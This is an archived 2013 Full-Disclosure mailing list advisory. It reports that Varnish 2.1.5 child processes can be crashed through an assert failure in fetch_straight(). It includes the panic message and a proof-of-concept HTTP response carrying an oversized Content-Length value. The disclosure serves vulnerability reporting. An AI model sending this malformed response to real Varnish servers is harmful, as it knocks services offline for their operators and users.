| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20130305210119.8465A14DBD4@smtp.hushmail.com> Date: Tue, 05 Mar 2013 21:01:19 +0000 From: tytusromekiatomek@...hmail.com To: full-disclosure@...ts.grok.org.uk Subject: Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header ############################################### # fetch_straight() | ((uintmax_t)cl == cll) # ############################################### # # Authors: # # 22733db72ab3ed94b5f8a1ffcde850251fe6f466 # c8e74ebd8392fda4788179f9a02bb49337638e7b # AKAT-1 # ####################################### # Versions: 2.1.5 # Summary It is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header. * Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true. POC(response): -- cut -- HTTP/1.1 200 OK Content-Type: text/xml; charset=utf-8 Content-Length: 99999999999999999 -- cut -- EOF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists